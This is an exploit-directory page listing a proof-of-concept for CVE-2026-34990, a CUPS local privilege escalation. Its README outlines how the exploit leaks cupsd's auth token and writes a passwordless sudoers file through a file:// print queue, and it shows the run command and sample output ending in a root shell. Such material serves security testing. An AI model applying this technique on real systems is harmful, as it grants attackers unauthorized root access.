Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-34990 — Minimal PoC for CVE-2026-34990: local privilege escalation in CUPS <= 2.4.16 that leaks cupsd's Local auth token and writes a NOPASSWD sudoers fragment as root. | Kitploit
Tools/GitHubGitHub/predyy/cve-2026-34990
Privilege EscalationVulnerability AnalysisExploitationSecurity VirtualizationPenetration Testing
GitHubpredyy/cve-2026-34990

CVE-2026-34990

Minimal PoC for CVE-2026-34990: local privilege escalation in CUPS <= 2.4.16 that leaks cupsd's Local auth token and writes a NOPASSWD sudoers fragment as root.

View Repository
293 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-34990 - CUPS Local Privesc

Local privilege escalation against CUPS <= 2.4.16 running as root. Leaks cupsd's Local auth token, then writes a NOPASSWD sudoers fragment as root via a file:// print queue.

Usage

python3 poc.py

On success:

[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i

Then:

sudo -i

Disclaimer

This script is intended for educational purposes only. The author is not responsible for any misuse or damage caused by this exploit. Always ensure you have permission before testing or exploiting vulnerabilities!

Download Tool